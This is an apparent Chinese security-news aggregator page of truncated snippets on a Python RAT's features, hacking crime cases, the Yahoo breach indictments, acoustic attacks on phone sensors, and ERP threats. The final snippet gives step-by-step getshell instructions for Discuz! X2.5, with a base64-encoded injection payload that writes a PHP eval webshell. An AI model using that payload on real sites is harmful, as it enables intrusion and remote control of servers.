14x Security Team

基于Python的远程管理工具（RAT） – StitchStitch是一款基于Python的跨平台远程管理工具。由于其跨平台性，Stitch允许用户针对Windows, Mac OSX 或 Linux分别定制不同的payload。你可以根据自己的需要，来选择绑定的IP及监听端口。你还可以设置是否在目标系统启动时，向你发送系统信息邮件，以及是否开启键盘记录。特点：跨平台支持：文件及命令自动执行防病毒检测可以打开或关闭显示屏监视器隐藏或显示文件和目录查看或修改hosts文件查看...

北京拓尔思信息技术股份有限公司招聘web安全工程师北京拓尔思信息技术股份有限公司是领先的大数据技术和服务提供商，注册资本4.66亿元，是国家规划布局内重点软件企业，2011年在深圳证券交易所创业板上市（股票代码300229），是第一家在A股上市的大数据技术企业。拓尔思以自身创新发展和产业整合并举，坚持技术+服务的双轮驱动战略，自主研发推出了海贝大数据管理平台和水晶分布式数据库平台，拥有大数据分析挖掘云服务平台，为政府、媒体、安全、金融、教育、企业等领域提供领先的大数据应用解决...

男子钻研黑客技术盗窃1300万 单次打赏女主播8万中新网3月16日电 互联网与人们的生活越来越密不可分，网络购物、网络直播等丰富着大众的物质和精神生活，但也有不法之徒利用自己的小聪明，为满足私欲，利用互联网犯罪。胡安是贵州省人，初中文化，案发前无业。2016年他钻研黑客技术在网上盗窃了1300万，被平台方发现后及时报警，两天后胡安被北京市公安局刑事拘留。今天上午，涉嫌盗窃罪的胡安在一中院受审。金钱观扭曲导致犯罪20岁的胡安只有初中文化，却非常迷恋网络，通过自学掌握了一些技术。...

黑客篡改成绩获刑！名声传开后，最多一科收800元“有没有挂科的同学要改成绩，想改的可以私聊我”。从2016年2月起，与四川多家院校有关的百度贴吧、聊天群中，开始出现一条“修改考试成绩”的广告。　　很快，一名挂科的大学生与小闫取得联系，一番讨价还价后，小闫答应以一科300元的价格，将该学生的考试成绩修改到及格。　　不久，这名挂科学生的成绩果然被修改。随后，小闫的名声在不少学生间传开，找他的人也越来越多。发现有“赚头”的小闫，收费价格也“水涨船高”，最多一科收800元。　　警方通...

艾玛-沃特森私密泳装照遭盗新浪娱乐讯 据台湾媒体报道，英国女星艾玛[微博]-沃特森（Emma Watson）的新片《美女与野兽》陆续在世界各地盛大上映，却突然爆出她的电脑遭黑客入侵，她试穿泳装拍摄的私人照片落到黑客手中，照片还被公布在加密的网站讨论区里。她被迫发表声明，发言人强调她没拍裸照，“两年前她与一名造型师在试装时拍的照片被黑客盗走，那些不是裸照，我们已经在与律师讨论对策，不便再多做评论”。　　媒体报道艾玛-沃特森与另一名女星亚曼达-席菲德都成遭黑对象，流出的是...

黑客能用声波入侵智能手机：细思极恐！研究人员解释了如何用声音将错误阅读信息发送到设备，通过设备的加速计发送。加速计很容易被攻击，因为它会振动。用声波冲击加速计，使其频率与振动保持一致，就可以发起攻击。黑客可以通过攻击摧毁加速计，不过密歇根大学研究人员挑战的任务更难：他们让手机、Fitbit出现异常行为。加速计将信号发送给设备，命令设备记录信息，或者完成动作，正因如此研究人员才能控制，    密歇根大学研究人员让一台Galaxy ...

一游戏公司被黑客控制 警方缴获20多万条被盗数据2016年12月7日，广州某游戏公司向公安机关报警，称其企业QQ被黑客非法控制，超级管理账号密码被篡改，包括企业内部架构、人员身份、职务信息、聊天记录、移动电话等大量涉及商业秘密的一批数据资料被盗取。因该案涉及黑客技术入侵和盗取公民个人信息、企业商业信息，广州市公安局网警支队迅速介入此案，会同企业属地天河区公安分局一起全面展开侦查取证。网警侦查发现，作案嫌疑人通过层层伪装，向涉案企业QQ发送病毒链接，植入木马程序，然后控制企业服...

美国检方对4名犯罪嫌疑人提出47项指控，其中包括共谋、计算机欺诈和接入设备欺诈。所有指控都与2014年针对雅虎的一次网络攻击活动有关，5亿名雅虎用户的个人信息被窃取，其中包括姓名、电子邮件地址、经过加密的密码等。雅虎2016年发现并公布了这次网络攻击活动，当时称这次攻击是由“国家赞助”的黑客发动的。当时安全研究人员对这一说法有争议，现在来看似乎是正确的。当然，俄罗斯卷入针对美国科技公司的网络攻击活动并不让人感到意外。过去，美国司法部就曾指控俄罗斯黑客的网络犯罪活动。去年美国总...

企业ERP系统面临的网络安全威胁一、ERP系统信息安全威胁安全问题的产生是一个非常复杂的问题，包含了多种因素的相互作用。总结起来，企业ERP系统所面临的信息安全威胁主要包括来自以下几个方面的内容：（一）ERP网络应用的威胁。来自网络层面的威胁主要来自远程访问企业内部系统所造成的信息泄漏隐患。随着企业规模的不断扩展，对外的销售和物流网络也随之扩大，出差的业务员和某些客户经常需要在异地远程访问企业网络资源。为此，ERP专门提供了B/S的访问模式，使得异地用户能够使用浏览器通过虚拟...

Discuz!X2.5 Release20120407版命令执行漏洞Getshell利用方法1.注册任意账户2.登陆用户，发表blog日志（注意是日志）3.添加图片，选择网络图片，地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}4.访问日志，论坛根目录下生成demo.php，一句话密码C...